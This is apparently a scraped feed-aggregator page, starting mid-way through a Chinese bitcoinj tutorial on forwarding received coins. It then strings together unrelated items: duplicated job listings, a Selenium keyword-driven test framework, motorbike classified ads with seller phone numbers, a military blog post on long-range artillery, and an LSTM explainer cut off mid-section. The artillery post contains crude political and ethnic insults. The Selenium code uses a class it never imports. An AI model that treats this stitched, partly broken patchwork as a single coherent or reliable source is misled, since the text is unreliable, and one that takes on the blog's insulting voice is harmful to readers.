            Futures.addCallback(tx.getConfidence().getDepthFuture(1), new FutureCallback<TransactionConfidence>() {
                @Override
                public void onSuccess(TransactionConfidence result) {
                    // "result" here is the same as "tx" above, but we use it anyway for clarity.
                    forwardCoins(result);
                }
    
                @Override
                public void onFailure(Throwable t) {}
            });
        }
    });

    在这里我们可以看到当我们的应用收到钱时会发生什么,我们打印出我们收到了多少,使用静态实用程序方法格式化为文本。

    然后我们做了一些更先进的事情。我们称之为这种方法:

    ListenableFuture<TransactionConfidence> future = tx.getConfidence().getDepthFuture(1);

    每个交易都有一个与之关联的confidence对象。confidence的概念体现了比特币是一个全球共识系统这一事实,该系统不断努力就全球交易顺序达成一致。因为这是一个难题(当遇到恶意行为者时),交易可能会被双倍花费(在比特币术语中我们说它已经dead)。也就是说,我们有可能相信我们已经收到了钱,后来我们发现世界其他地方不同意我们的看法。

    Confidence对象包含我们可以用来做出基于风险的决策的数据,这些决策是关于我们实际收到钱的可能性。它们还可以帮助我们在信心变化或达到某个阈值时学习。

    Futures是并发编程中的一个重要概念,bitcoinj大量使用它们,特别是我们将Guava扩展用于标准的Java Future类,称为ListenableFutureListenableFuture表示未来某种计算或状态的结果。你可以等待它完成(阻止调用线程),或者注册将被调用的回调。期货也可能会失败,在这种情况下,你会收到异常而不是结果。

    在这里,我们要求depth future。当交易被链中的至少那么多块掩埋时,这个future就完成了。深度为1表示它出现在链中的顶部块中。所以在这里,我们说“当交易至少有一个确认时运行此代码”。通常你会使用一个名为Futures.addCallback的实用工具方法,虽然还有另一种注册监听器的方法,可以在下面的代码片段中看到。

    然后,当发送给我们钱的交易确认时,我们只调用一个我们自己定义的方法叫做forwardCoins

    这里有一件重要的事情需要注意。depth future可能会运行,然后交易的depth变为小于future的参数。这是因为在任何时候比特币网络都可能经历“重组”,其中最着名的链从一个切换到另一个。如果你的交易出现在新链中的其他位置,则depth实际上可能会下降而不是向上。处理入库付款时,你应确保如果交易信心下降,你会尝试中止你为该资金提供的任何服务。你可以通过阅读SPV安全模型了解有关此主题的更多信息。

    处理re-orgs和double spends是一个复杂的主题,本教程未涉及。你可以通过阅读其他文章了解更多信息。

    发送比特币

    ForwardingService的最后一部分是发送我们刚刚收到的比特币。

    Coin value = tx.getValueSentToMe(kit.wallet());
    System.out.println("Forwarding " + value.toFriendlyString() + " BTC");
    // Now send the coins back! Send with a small fee attached to ensure rapid confirmation.
    final Coin amountToSend = value.subtract(Transaction.REFERENCE_DEFAULT_MIN_TX_FEE);
    final Wallet.SendResult sendResult = kit.wallet().sendCoins(kit.peerGroup(), forwardingAddress, amountToSend);
    System.out.println("Sending ...");
    // Register a callback that is invoked when the transaction has propagated across the network.
    // This shows a second style of registering ListenableFuture callbacks, it works when you don't
    // need access to the object the future returns.
    sendResult.broadcastComplete.addListener(new Runnable() {
        @Override
        public void run() {
             // The wallet has changed now, it'll get auto saved shortly or when the app shuts down.
             System.out.println("Sent coins onwards! Transaction hash is " + sendResult.tx.getHashAsString());
        }
    });

    首先,我们查询我们收到多少钱(当然,由于我们的应用程序的性质,这与上面的onCoinsReceived回调中的newBalance相同)。

    然后我们决定发送多少——它与我们收到的相同,减去费用。我们不需要附加费用,但如果我们不这样做,可能需要一段时间才能确认。默认费用很低。

    要发送比特币,我们使用钱包sendCoins方法。它需要三个参数:TransactionBroadcaster(通常是PeerGroup),发送比特币的地址(这里我们使用我们之前从命令行解析的地址)以及要发送多少钱。

    sendCoins返回一个SendResult对象,该对象包含已创建的交易和一个ListenableFuture,可用于查明网络何时接受付款。如果钱包没有足够的钱,sendCoins方法将抛出一个异常,其中包含一些关于缺少多少钱的信息。

    自定义发送过程和设置费用

    比特币交易可以附加费用。这对于反拒绝服务机制很有用,但它主要是为了在通货膨胀率下降时激励系统后期的采矿。你可以通过自定义发送请求来控制附加到交易的费用:

    SendRequest req = SendRequest.to(address, value);
    req.feePerKb = Coin.parseCoin("0.0005");
    Wallet.SendResult result = wallet.sendCoins(peerGroup, req);
    Transaction createdTx = result.tx;

    请注意,在这里,我们实际上设置了每千字节创建的交易的费用。这就是比特币的工作原理——交易的优先级由费用除以大小决定,因此较大的交易要求较高的费用被视为与较小的交易“相同”。

    写在最后

    bitcoinj还有许多其他功能,本教程不涉及这些功能。你可以阅读其他文章以了解有关完整验证,钱包加密等的更多信息,当然JavaDocs还详细介绍了完整的API。

    我建议你浏览我们的区块链教程和区块链技术博客,深入了解区块链,比特币,加密货币,以太坊,和智能合约。

    • java以太坊开发教程,主要是针对java和android程序员进行区块链以太坊开发的web3j详解。
    • php比特币开发教程本课程面向初学者,内容即涵盖比特币的核心概念,例如区块链存储、去中心化共识机制、密钥与脚本、交易与UTXO等,同时也详细讲解如何在Php代码中集成比特币支持功能,例如创建地址、管理钱包、构造裸交易等,是Php工程师不可多得的比特币开发学习课程。
    • java比特币开发教程,本课程面向初学者,内容即涵盖比特币的核心概念,例如区块链存储、去中心化共识机制、密钥与脚本、交易与UTXO等,同时也详细讲解如何在Java代码中集成比特币支持功能,例如创建地址、管理钱包、构造裸交易等,是Java工程师不可多得的比特币开发学习课程。

    这里是原文 



    作者: it_node 
    声明: 本文系ITeye网站发布的原创文章,未经作者书面许可,严禁任何网站转载本文,否则必将追究法律责任!

    已有 0 人发表回复,猛击->>这里<<-参与讨论


    ITeye推荐




              SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
    PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
    From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
              SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
    PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
    From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
              SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
    PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
    From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
              Continuum Analytics Blog: Anaconda Enterprise 5.2.2: Now With Apache Zeppelin and GPU improvements      Cache   Translate Page      

    Anaconda Enterprise 5.2 introduced exciting features such as GPU-acceleration, scalable machine learning, and cloud-native model management in July. Today we’re releasing Anaconda Enterprise 5.2.2 with a number of enhancements in IDEs (Integrated Development Environments), GPU resource management, source code control, and (of course) bug fixes.One of the biggest new benefits is the addition of Apache Zeppelin …
    Read more →

    The post Anaconda Enterprise 5.2.2: Now With Apache Zeppelin and GPU improvements appeared first on Anaconda.


              Keyword Driven Framework Example      Cache   Translate Page      

    In this framework, keywords are developed which are equal to a unit level functionality. It is an independent framework which perform automation based on the keywords specified in the excel sheet. Based on the type of application, the number of keywords will be increased to handle different functionalities.

    The below are the few keywords which are used commonly in the web applications.

    open_Browser(browserName): In this method we need to pass browser name which will invoke the respective driver. example, If the user pass 'chrome' as a browser name, it will invoke the chrome driver.

    enter_TextOnTextBox(locator, locatorValue, textToEnter) : This method is used to enter the text by using sendkeys method. Here we need to use three parameters the first one is locator type that can be id / name / any other locator, second parameter should be the locator value And the last method should be the data that you want to pass into the text field.

    click_On_Link(locatorType, locatorValue): Here we have to have two parameters, First parameter is locator type, and it should be linkText or partialLinkText and the text that we need to click on.

    select_Checkbox(locatorType, locatorValue) and deselect_Checkbox(locatorType, locatorValue) : Here we need to have two parameters locator type and locator value which will select / deselect the checkbox. If we need to select/deselect multiple check boxes we need to handle it in a different way.

    After defining the methods, we need a method to read the data (methods and parameters) from excel sheet. And once when the data is ready, we need to invoke that particular method dynamically as we don't know the methods until we start executing hence we need to handle it during Run time.

    To make this work we can use the concept of Java 'Reflection API' which commonly used for observing and/or modifying program execution at runtime.

    You can find good examples on reflection here
    click here for Java Reflection API

    Here is the simple keyword driven framework example :

    Step 1: We will define a class called KeyWordExample, which will have all the resuable methods, driver invocation, taking the screen shot and reporting mechanism.

    package com.keyword.sample;
    
    import org.openqa.selenium.By;
    import org.openqa.selenium.NoSuchElementException;
    import org.openqa.selenium.WebDriver;
    import org.openqa.selenium.WebDriverException;
    import org.openqa.selenium.WebElement;
    import org.openqa.selenium.chrome.ChromeDriver;
    import org.openqa.selenium.firefox.FirefoxDriver;
    import org.openqa.selenium.support.ui.WebDriverWait;
    
    public class KeyWordExample {
    
    	static WebDriver driver;
    	static WebDriverWait wait;
    
    	public void open_Browser(String browserName) {
    		try {
    			if (browserName.equalsIgnoreCase("Firefox")) {
    				driver = new FirefoxDriver();
    			} else if (browserName.equalsIgnoreCase("chrome")) {
    				System.setProperty("webdriver.chrome.driver",
    						"D:/Jars/chromedriver.exe");
    				driver = new ChromeDriver();
    			} else if (browserName.equalsIgnoreCase("IE")) {
    				System.setProperty("webdriver.ie.driver",
    						"D:/Jars/IEDriverServer.exe");
    				driver = new InternetExplorerDriver();
    			}
    		} catch (WebDriverException e) {
    			System.out.println(e.getMessage());
    		}
    	}
    
    	public void enter_URL(String URL) {
    		driver.navigate().to(URL);
    	}
    
    	public By locatorValue(String locatorTpye, String value) {
    		By by;
    		switch (locatorTpye) {
    		case "id":
    			by = By.id(value);
    			break;
    		case "name":
    			by = By.name(value);
    			break;
    		case "xpath":
    			by = By.xpath(value);
    			break;
    		case "css":
    			by = By.cssSelector(value);
    			break;
    		case "linkText":
    			by = By.linkText(value);
    			break;
    		case "partialLinkText":
    			by = By.partialLinkText(value);
    			break;
    		default:
    			by = null;
    			break;
    		}
    		return by;
    	}
    
    	public void enter_Text(String locatorType, String value, String text) {
    		try {
    			By locator;
    			locator = locatorValue(locatorType, value);
    			WebElement element = driver.findElement(locator);
    			element.sendKeys(text);
    		} catch (NoSuchElementException e) {
    			System.err.format("No Element Found to enter text" + e);
    		}
    	}
    
    	public void click_On_Link(String locatorType, String value) {
    		try {
    			By locator;
    			locator = locatorValue(locatorType, value);
    			WebElement element = driver.findElement(locator);
    			element.click();
    		} catch (NoSuchElementException e) {
    			System.err.format("No Element Found to enter text" + e);
    		}
    	}
    
    	public void click_On_Button(String locatorType, String value) {
    		try {
    			By locator;
    			locator = locatorValue(locatorType, value);
    			WebElement element = driver.findElement(locator);
    			element.click();
    		} catch (NoSuchElementException e) {
    			System.err.format("No Element Found to perform click" + e);
    		}
    	}
    	
    	public void close_Browser() {
    		driver.quit();
    	}
    }

    Step 2: We will define other class called KeyWordExecution, which takes the responsibility of retrieving the data from excel sheet, identify the locators and parameters and invoke the respective methods in the 'KeyWordExample' class.

    package com.keyword.sample;
    
    import java.lang.reflect.InvocationTargetException;
    import java.lang.reflect.Method;
    import java.util.ArrayList;
    import java.util.List;
    
    public class KeyWordExecution {
    
    	public void runReflectionMethod(String strClassName, String strMethodName,
    			Object... inputArgs) {
    
    		Class<?> params[] = new Class[inputArgs.length];
    
    		for (int i = 0; i < inputArgs.length; i++) {
    			if (inputArgs[i] instanceof String) {
    				params[i] = String.class;
    			}
    		}
    		try {
    			Class<?> cls = Class.forName(strClassName);
    			Object _instance = cls.newInstance();
    			Method myMethod = cls.getDeclaredMethod(strMethodName, params);
    			myMethod.invoke(_instance, inputArgs);
    
    		} catch (ClassNotFoundException e) {
    			System.err.format(strClassName + ":- Class not found%n");
    		} catch (IllegalArgumentException e) {
    			System.err
    					.format("Method invoked with wrong number of arguments%n");
    		} catch (NoSuchMethodException e) {
    			System.err.format("In Class " + strClassName + "::" + strMethodName
    					+ ":- method does not exists%n");
    		} catch (InvocationTargetException e) {
    			System.err.format("Exception thrown by an invoked method%n");
    		} catch (IllegalAccessException e) {
    			System.err
    					.format("Can not access a member of class with modifiers private%n");
    			e.printStackTrace();
    		} catch (InstantiationException e) {
    			System.err
    					.format("Object cannot be instantiated for the specified class using the newInstance method%n");
    		}
    	}
    
    	public static void main(String[] args) {
    		KeyWordExecution exeKey = new KeyWordExecution();
    		ReadExcel excelSheet = new ReadExcel();
    		excelSheet.openSheet("D:/testCaseSheet.xls");
    		for (int row = 1; row < excelSheet.getRowCount(); row++) {
    			List<Object> myParamList = new ArrayList<Object>();
    			String methodName = excelSheet.getValueFromCell(0, row);
    			for (int col = 1; col < excelSheet.getColumnCount(); col++) {
    				if (!excelSheet.getValueFromCell(col, row).isEmpty()
    						& !excelSheet.getValueFromCell(col, row).equals("null")) {
    					myParamList.add(excelSheet.getValueFromCell(col, row));
    				}
    			}
    
    			Object[] paramListObject = new String[myParamList.size()];
    			paramListObject = myParamList.toArray(paramListObject);
    
    			exeKey.runReflectionMethod("com.keyword.sample.KeyWordExample",
    					methodName, paramListObject);
    		}
    	}
    }

    Step 3: We will create an other class to read the excel sheet. We have used jxl library to read the data from excel. You can also use 'Apache POI' to do the same.

    Click here for jxl tutorials

    package com.keyword.sample;
    
    import java.io.FileInputStream;
    import java.io.FileNotFoundException;
    import java.io.IOException;
    import jxl.Sheet;
    import jxl.Workbook;
    import jxl.read.biff.BiffException;
    
    public class ReadExcel {
    
    	Workbook wbWorkbook;
    	Sheet shSheet;
    
    	public void openSheet(String filePath) {
    		FileInputStream fs;
    		try {
    			fs = new FileInputStream(filePath);
    			wbWorkbook = Workbook.getWorkbook(fs);
    			shSheet = wbWorkbook.getSheet(0);
    
    		} catch (FileNotFoundException e) {
    			e.printStackTrace();
    		} catch (BiffException e) {
    			e.printStackTrace();
    		} catch (IOException e) {
    			e.printStackTrace();
    		}
    	}
    
    	public String getValueFromCell(int iColNumber, int iRowNumber) {
    		return shSheet.getCell(iColNumber, iRowNumber).getContents();
    	}
    
    	public int getRowCount() {
    		return shSheet.getRows();
    	}
    
    	public int getColumnCount() {
    		return shSheet.getColumns();
    	}
    }

    The below is the excel file which has provided with four columns :
    Project Structure

    The main advantage going for keyword driven framework is 'Re-usability', we can re-use the same methods for number of test cases. We can extend the framework by increasing flexibility with minimum effort.

    Hope this helps you in understanding about keyword driven framework.

    Selenium Tutorials: 

               TVS Apache RTR 648817 Kms 2007 year       Cache   Translate Page      
    Price: ₹ 10,000, Model: Apache RTR, Year: 2007 , KM Driven: 6,48,817 km,
    Bike in pakka condition my.num . 709207967.4 https://www.olx.in/item/tvs-apache-rtr-648817-kms-2007-year-ID1ok2Bb.html
               TVS Apache RTR 47658 Kms 2010 year       Cache   Translate Page      
    Price: ₹ 28,000, Model: Apache RTR, Year: 2010 , KM Driven: 47,658 km,
    Apache pakka condition self start https://www.olx.in/item/tvs-apache-rtr-47658-kms-2010-year-ID1oj3LP.html
               TVS Apache RTR 40000 Kms 2010 year       Cache   Translate Page      
    Price: ₹ 20,000, Model: Apache RTR, Year: 2010 , KM Driven: 40,000 km,
    Nice Running Condition
    Single Owner 2010 Model
    TN Registration
    Recently Oil Serviced
    Mileage 45 kmpl
    9_5_9_7_3_9_3_0_3_4 https://www.olx.in/item/tvs-apache-rtr-40000-kms-2010-year-ID1jT7Jt.html
              King Of Battle       Cache   Translate Page      
    h/t 90 Miles From Tyranny

    Army redlegs on M777 Ultralight howitzer practice Darwinian selection on notional
    enemy.  Now with twice the rangey goodness as original recipe 155mm.


















    Dear Redlegs: "Fire mission!"
    The Army has successfully fired a 155mm artillery round 62 kilometers - marking a technical breakthrough in the realm of land-based weapons and progressing toward its stated goal of being able to outrange and outgun Russian and Chinese weapons. “We just doubled the range of our artillery at Yuma Proving Ground,” Gen. John Murray, Commanding General of Army Futures Command, told reporters at the Association of the United States Army Annual Symposium.
    This concept of operations is intended to enable mechanized attack forces and advancing infantry with an additional stand-off range or protective sphere with which to conduct operations. Longer range precision fire can hit enemy troop concentrations, supply lines and equipment essential to a coordinated attack, while allowing forces to stay farther back from incoming enemy fire.
    A 70-kilometer target range is, by any estimation, a substantial leap forward for artillery; when GPS guided precision 155mm artillery rounds, such as Excalibur, burst into land combat about ten years ago - its strike range was reported at roughly 30 kilometers. A self-propelled Howitzer able to hit 70-kilometers puts the weapon on par with some of the Army’s advanced land-based rockets - such as its precision-enabled Guided Multiple Launch Rocket System which also reaches 70-kilometers.

    For Common Core grads, 30km is 18 miles. 62km would be 37 miles.
    The source notes the newest Russian systems tap out at 40 klicks, so the new setup bones everyone downrange, except us. They also note the use of drones as OTH FO enablers, exactly as was practiced going back to the early 1980s, including by the big guns on the refloated Iowa-class BBs. (That's right, sports fans, we were killing people with drones back to the Reagan era. We just started that out with the Navy's 16" guns providing the punch.)

    Being able to accurately shell the shit out of enemy targets from 37 miles away is a game changer. (Presumably, someone may have a chat with Navy Surface Warfare about this development as well, once they get the Obozo-era idiots, civilian and commissioned, out of the warship design department, and go back to fielding surface warships, instead of fielding Floating Diversity Training Classrooms.)

    Artillery never gets tired, can fly in all weather, can't be shot down, and can eliminate everything involved in an airstrike, airframe, pilot, etc., except the actual ordnance delivered. One howitzer can deliver as much hate on target as a WWII B17 did, in about 3 minutes.
    A six-gun battery outperforms a B-2 strike as far as tonnage delivered (not range) in about  half an hour. And at a cost savings of a couple of billion dollars. Just saying.

    Air strikes are great for deep interdiction. But they pale to artillery for all-weather around-the-clock reliability and volume, unless you're willing to stand up the entire SAC boneyard of B-52s and bring SAC back online.

    And that means you won't have some ill-conceived Medal of honor factory Outpost at the bottom of Death Valley in some Turd World Trashcanistan being told on the radio "Sorry, you're outside the range fan of friendly fires, lump it, and good luck with staying alive in Fort Apache."

    And yes, fellow ground warriors, infantry will always be the Queen of Battle.

    And we know what the King does to the Queen.
    This is why you want us on your side.
    "Artillery lends dignity to what would otherwise be a vulgar brawl." - Lt. Graham, Major Dundee

     And with no apologies to George Carlin, consider the howitzer:
    "I really want to f**k up those guys over there, 37 miles away, but I just can't quite get to them from here..."

    Problem: Solved.

              Exploring LSTMs      Cache   Translate Page      

    It turns out LSTMs are a fairly simple extension to neural networks, and they're behind a lot of the amazing achievements deep learning has made in the past few years. So I'll try to present them as intuitively as possible – in such a way that you could have discovered them yourself.

    But first, a picture:

    LSTM

    Aren't LSTMs beautiful? Let's go.

    (Note: if you're already familiar with neural networks and LSTMs, skip to the middle – the first half of this post is a tutorial.)

    Neural Networks

    Imagine we have a sequence of images from a movie, and we want to label each image with an activity (is this a fight?, are the characters talking?, are the characters eating?).

    How do we do this?

    One way is to ignore the sequential nature of the images, and build a per-image classifier that considers each image in isolation. For example, given enough images and labels:

    • Our algorithm might first learn to detect low-level patterns like shapes and edges.
    • With more data, it might learn to combine these patterns into more complex ones, like faces (two circular things atop a triangular thing atop an oval thing) or cats.
    • And with even more data, it might learn to map these higher-level patterns into activities themselves (scenes with mouths, steaks, and forks are probably about eating).

    This, then, is a deep neural network: it takes an image input, returns an activity output, and – just as we might learn to detect patterns in puppy behavior without knowing anything about dogs (after seeing enough corgis, we discover common characteristics like fluffy butts and drumstick legs; next, we learn advanced features like splooting) – in between it learns to represent images through hidden layers of representations.

    Mathematically

    I assume people are familiar with basic neural networks already, but let's quickly review them.

    • A neural network with a single hidden layer takes as input a vector x, which we can think of as a set of neurons.
    • Each input neuron is connected to a hidden layer of neurons via a set of learned weights.
    • The jth hidden neuron outputs \(h_j = \phi(\sum_i w_{ij} x_i)\), where \(\phi\) is an activation function.
    • The hidden layer is fully connected to an output layer, and the jth output neuron outputs \(y_j = \sum_i v_{ij} h_i\). If we need probabilities, we can transform the output layer via a softmax function.

    In matrix notation:

    $$h = \phi(Wx)$$
    $$y = Vh$$

    where

    • x is our input vector
    • W is a weight matrix connecting the input and hidden layers
    • V is a weight matrix connecting the hidden and output layers
    • Common activation functions for \(\phi\) are the sigmoid function, \(\sigma(x)\), which squashes numbers into the range (0, 1); the hyperbolic tangent, \(tanh(x)\), which squashes numbers into the range (-1, 1), and the rectified linear unit, \(ReLU(x) = max(0, x)\).

    Here's a pictorial view:

    Neural Network

    (Note: to make the notation a little cleaner, I assume x and h each contain an extra bias neuron fixed at 1 for learning bias weights.)

    Remembering Information with RNNs

    Ignoring the sequential aspect of the movie images is pretty ML 101, though. If we see a scene of a beach, we should boost beach activities in future frames: an image of someone in the water should probably be labeled swimming, not bathing, and an image of someone lying with their eyes closed is probably suntanning. If we remember that Bob just arrived at a supermarket, then even without any distinctive supermarket features, an image of Bob holding a slab of bacon should probably be categorized as shopping instead of cooking.

    So what we'd like is to let our model track the state of the world:

    1. After seeing each image, the model outputs a label and also updates the knowledge it's been learning. For example, the model might learn to automatically discover and track information like location (are scenes currently in a house or beach?), time of day (if a scene contains an image of the moon, the model should remember that it's nighttime), and within-movie progress (is this image the first frame or the 100th?). Importantly, just as a neural network automatically discovers hidden patterns like edges, shapes, and faces without being fed them, our model should automatically discover useful information by itself.
    2. When given a new image, the model should incorporate the knowledge it's gathered to do a better job.

    This, then, is a recurrent neural network. Instead of simply taking an image and returning an activity, an RNN also maintains internal memories about the world (weights assigned to different pieces of information) to help perform its classifications.

    Mathematically

    So let's add the notion of internal knowledge to our equations, which we can think of as pieces of information that the network maintains over time.

    But this is easy: we know that the hidden layers of neural networks already encode useful information about their inputs, so why not use these layers as the memory passed from one time step to the next? This gives us our RNN equations:

    $$h_t = \phi(Wx_t + Uh_{t-1})$$
    $$y_t = Vh_t$$

    Note that the hidden state computed at time \(t\) (\(h_t\), our internal knowledge) is fed back at the next time step. (Also, I'll use concepts like hidden state, knowledge, memories, and beliefs to describe \(h_t\) interchangeably.)

    RNN

    Longer Memories through LSTMs

    Let's think about how our model updates its knowledge of the world. So far, we've placed no constraints on this update, so its knowledge can change pretty chaotically: at one frame it thinks the characters are in the US, at the next frame it sees the characters eating sushi and thinks they're in Japan, and at the next frame it sees polar bears and thinks they're on Hydra Island. Or perhaps it has a wealth of information to suggest that Alice is an investment analyst, but decides she's a professional assassin after seeing her cook.

    This chaos means information quickly transforms and vanishes, and it's difficult for the model to keep a long-term memory. So what we'd like is for the network to learn how to update its beliefs (scenes without Bob shouldn't change Bob-related information, scenes with Alice should focus on gathering details about her), in a way that its knowledge of the world evolves more gently.

    This is how we do it.

    1. Adding a forgetting mechanism. If a scene ends, for example, the model should forget the current scene location, the time of day, and reset any scene-specific information; however, if a character dies in the scene, it should continue remembering that he's no longer alive. Thus, we want the model to learn a separate forgetting/remembering mechanism: when new inputs come in, it needs to know which beliefs to keep or throw away.
    2. Adding a saving mechanism. When the model sees a new image, it needs to learn whether any information about the image is worth using and saving. Maybe your mom sent you an article about the Kardashians, but who cares?
    3. So when new a input comes in, the model first forgets any long-term information it decides it no longer needs. Then it learns which parts of the new input are worth using, and saves them into its long-term memory.
    4. Focusing long-term memory into working memory. Finally, the model needs to learn which parts of its long-term memory are immediately useful. For example, Bob's age may be a useful piece of information to keep in the long term (children are more likely to be crawling, adults are more likely to be working), but is probably irrelevant if he's not in the current scene. So instead of using the full long-term memory all the time, it learns which parts to focus on instead.

    This, then, is an long short-term memory network. Whereas an RNN can overwrite its memory at each time step in a fairly uncontrolled fashion, an LSTM transforms its memory in a very precise way: by using specific learning mechanisms for which pieces of information to remember, which to update, and which to pay attention to. This helps it keep track of information over longer periods of time.

    Mathematically

    Let's describe the LSTM additions mathematically.

    At time \(t\), we receive a new input \(x_t\). We also have our long-term and working memories passed on from the previous time step, \(ltm_{t-1}\) and \(wm_{t-1}\) (both n-length vectors), which we want to update.

    We'll start with our long-term memory. First, we need to know which pieces of long-term memory to continue remembering and which to discard, so we want to use the new input and our working memory to learn a remember gate of n numbers between 0 and 1, each of which determines how much of a long-term memory element to keep. (A 1 means to keep it, a 0 means to forget it entirely.)

    Naturally, we can use a small neural network to learn this remember gate:

    $$remember_t = \sigma(W_r x_t + U_r wm_{t-1}) $$

    (Notice the similarity to our previous network equations; this is just a shallow neural network. Also, we use a sigmoid activation because we need numbers between 0 and 1.)

    Next, we need to compute the information we can learn from \(x_t\), i.e., a candidate addition to our long-term memory:

    $$ ltm'_t = \phi(W_l x_t + U_l wm_{t-1}) $$

    \(\phi\) is an activation function, commonly chosen to be \(tanh\).

    Before we add the candidate into our memory, though, we want to learn which parts of it are actually worth using and saving:

    $$save_t = \sigma(W_s x_t + U_s wm_{t-1})$$

    (Think of what happens when you read something on the web. While a news article might contain information about Hillary, you should ignore it if the source is Breitbart.)

    Let's now combine all these steps. After forgetting memories we don't think we'll ever need again and saving useful pieces of incoming information, we have our updated long-term memory:

    $$ltm_t = remember_t \circ ltm_{t-1} + save_t \circ ltm'_t$$

    where \(\circ\) denotes element-wise multiplication.

    Next, let's update our working memory. We want to learn how to focus our long-term memory into information that will be immediately useful. (Put differently, we want to learn what to move from an external hard drive onto our working laptop.) So we learn a focus/attention vector:

    $$focus_t = \sigma(W_f x_t + U_f wm_{t-1})$$

    Our working memory is then

    $$wm_t = focus_t \circ \phi(ltm_t)$$

    In other words, we pay full attention to elements where the focus is 1, and ignore elements where the focus is 0.

    And we're done! Hopefully this made it into your long-term memory as well.


    To summarize, whereas a vanilla RNN uses one equation to update its hidden state/memory:

    $$h_t = \phi(Wx_t + Uh_{t-1})$$

    An LSTM uses several:

    $$ltm_t = remember_t \circ ltm_{t-1} + save_t \circ ltm'_t$$
    $$wm_t = focus_t \circ tanh(ltm_t)$$

    where each memory/attention sub-mechanism is just a mini brain of its own:

    $$remember_t = \sigma(W_r x_t+ U_r wm_{t-1}) $$
    $$save_t = \sigma(W_s x_t + U_s wm_{t-1})$$
    $$focus_t = \sigma(W_f x_t + U_f wm_{t-1})$$
    $$ ltm'_t = tanh(W_l x_t + U_l wm_{t-1}) $$

    (Note: the terminology and variable names I've been using are different from the usual literature. Here are the standard names, which I'll use interchangeably from now on:

    • The long-term memory, \(ltm_t\), is usually called the cell state, denoted \(c_t\).
    • The working memory, \(wm_t\), is usually called the hidden state, denoted \(h_t\). This is analogous to the hidden state in vanilla RNNs.
    • The remember vector, \(remember_t\), is usually called the forget gate (despite the fact that a 1 in the forget gate still means to keep the memory and a 0 still means to forget it), denoted \(f_t\).
    • The save vector, \(save_t\), is usually called the input gate (as it determines how much of the input to let into the cell state), denoted \(i_t\).
    • The focus vector, \(focus_t\), is usually called the output gate, denoted \(o_t\). )

    LSTM

    Snorlax

    I could have caught a hundred Pidgeys in the time it took me to write this post, so here's a cartoon.

    Neural Networks

    Neural Network

    Recurrent Neural Networks

    RNN

    LSTMs

    LSTM

    Learning to Code

    Let's look at a few examples of what an LSTM can do. Following Andrej Karpathy's terrific post, I'll use character-level LSTM models that are fed sequences of characters and trained to predict the next character in the sequence.

    While this may seem a bit toyish, character-level models can actually be very useful, even on top of word models. For example:

    • Imagine a code autocompleter smart enough to allow you to program on your phone. An LSTM could (in theory) track the return type of the method you're currently in, and better suggest which variable to return; it could also know without compiling whether you've made a bug by returning the wrong type.
    • NLP applications like machine translation often have trouble dealing with rare terms. How do you translate a word you've never seen before, or convert adjectives to adverbs? Even if you know what a tweet means, how do you generate a new hashtag to capture it? Character models can daydream new terms, so this is another area with interesting applications.

    So to start, I spun up an EC2 p2.xlarge spot instance, and trained a 3-layer LSTM on the Apache Commons Lang codebase. Here's a program it generates after a few hours.

    While the code certainly isn't perfect, it's better than a lot of data scientists I know. And we can see that the LSTM has learned a lot of interesting (and correct!) coding behavior:

    • It knows how to structure classes: a license up top, followed by packages and imports, followed by comments and a class definition, followed by variables and methods. Similarly, it knows how to create methods: comments follow the correct orders (description, then @param, then @return, etc.), decorators are properly placed, and non-void methods end with appropriate return statements. Crucially, this behavior spans long ranges of code – see how giant the blocks are!
    • It can also track subroutines and nesting levels: indentation is always correct, and if statements and for loops are always closed out.
    • It even knows how to create tests.

    How does the model do this? Let's look at a few of the hidden states.

    Here's a neuron that seems to track the code's outer level of indentation:

    (As the LSTM moves through the sequence, its neurons fire at varying intensities. The picture represents one particular neuron, where each row is a sequence and characters are color-coded according to the neuron's intensity; dark blue shades indicate large, positive activations, and dark red shades indicate very negative activations.)

    Outer Level of Indentation

    And here's a neuron that counts down the spaces between tabs:

    Tab Spaces

    For kicks, here's the output of a different 3-layer LSTM trained on TensorFlow's codebase:

    There are plenty of other fun examples floating around the web, so check them out if you want to see more.

    Investigating LSTM Internals

    Let's dig a little deeper. We looked in the last section at examples of hidden states, but I wanted to play with LSTM cell states and their other memory mechanisms too. Do they fire when we expect, or are there surprising patterns?

    Counting

    To investigate, let's start by teaching an LSTM to count. (Remember how the Java and Python LSTMs were able to generate proper indentation!) So I generated sequences of the form

    aaaaaXbbbbb
    

    (N "a" characters, followed by a delimiter X, followed by N "b" characters, where 1 <= N <= 10), and trained a single-layer LSTM with 10 hidden neurons.

    As expected, the LSTM learns perfectly within its training range – and can even generalize a few steps beyond it. (Although it starts to fail once we try to get it to count to 19.)

    aaaaaaaaaaaaaaaXbbbbbbbbbbbbbbb
    aaaaaaaaaaaaaaaaXbbbbbbbbbbbbbbbb
    aaaaaaaaaaaaaaaaaXbbbbbbbbbbbbbbbbb
    aaaaaaaaaaaaaaaaaaXbbbbbbbbbbbbbbbbbb
    aaaaaaaaaaaaaaaaaaaXbbbbbbbbbbbbbbbbbb # Here it begins to fail: the model is given 19 "a"s, but outputs only 18 "b"s.
    

    We expect to find a hidden state neuron that counts the number of a's if we look at its internals. And we do:

    Neuron #2 Hidden State

    I built a small web app to play around with LSTMs, and Neuron #2 seems to be counting both the number of a's it's seen, as well as the number of b's. (Remember that cells are shaded according to the neuron's activation, from dark red [-1] to dark blue [+1].)

    What about the cell state? It behaves similarly:

    Neuron #2 Cell State

    One interesting thing is that the working memory looks like a "sharpened" version of the long-term memory. Does this hold true in general?

